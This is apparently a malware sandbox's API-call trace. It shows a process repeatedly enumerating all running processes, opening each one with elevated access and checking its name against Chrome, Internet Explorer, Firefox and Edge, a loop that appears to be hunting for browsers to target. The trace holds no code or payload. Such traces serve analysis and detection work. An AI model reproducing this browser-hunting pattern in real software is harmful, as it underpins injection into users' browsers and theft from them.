	[0227.912] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0227.913] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x625c
	[0227.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.913] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0227.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.913] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.914] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0227.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.914] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.914] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0227.915] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6260
	[0227.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.915] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0227.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.915] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.916] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0227.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.916] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.916] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6264
	[0227.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.917] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.918] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.918] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.918] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.919] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.919] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.920] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6268
	[0227.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.920] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.921] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.921] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.921] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.921] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.922] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x626c
	[0227.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.922] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.923] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.923] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.923] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0227.924] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6270
	[0227.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.924] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0227.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.925] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.925] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0227.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.926] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0227.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6274
	[0227.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.927] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.927] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.927] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.928] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.928] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.929] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6278
	[0227.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.929] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.929] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.929] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.930] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.930] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0227.931] CloseHandle (hObject=0x4fd0) returned 1
	[0227.931] Sleep (dwMilliseconds=0x64) 
	[0228.027] GetCurrentProcessId () returned 0x110
	[0228.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0228.032] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0228.035] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0228.037] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0228.039] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x627c
	[0228.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.039] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0228.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.040] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.041] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0228.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.041] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.041] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0228.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6280
	[0228.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.042] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0228.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.043] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.043] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0228.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.043] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.044] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0228.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6284
	[0228.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.045] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0228.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.045] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.045] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0228.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.046] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.046] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0228.047] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6288
	[0228.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.047] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0228.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.047] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.047] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0228.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.048] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.048] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0228.049] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x628c
	[0228.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.049] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0228.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.049] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.049] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0228.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.050] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.050] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0228.051] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6290
	[0228.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.051] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0228.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.051] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.052] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0228.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.052] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.052] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0228.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6294
	[0228.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.053] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0228.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.053] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.054] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0228.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.054] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.054] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0228.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x6298
	[0228.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.055] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0228.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.055] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.056] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0228.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.056] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.056] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.057] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x629c
	[0228.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.057] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.057] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.058] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.058] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.058] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x62a0
	[0228.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.059] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.060] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.060] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.060] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.060] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.061] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x62a4
	[0228.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.061] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.062] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.062] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.062] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.062] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.063] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x62a8
	[0228.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.063] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.064] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.064] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.064] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.065] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.065] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x62ac
	[0228.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.065] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.066] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.066] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.066] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.067] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.067] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x62b0
	[0228.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.068] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.068] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.068] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.069] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.069] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.070] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x62b4
	[0228.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.070] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.070] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.070] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.071] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0228.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62b8
	[0228.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.072] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0228.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
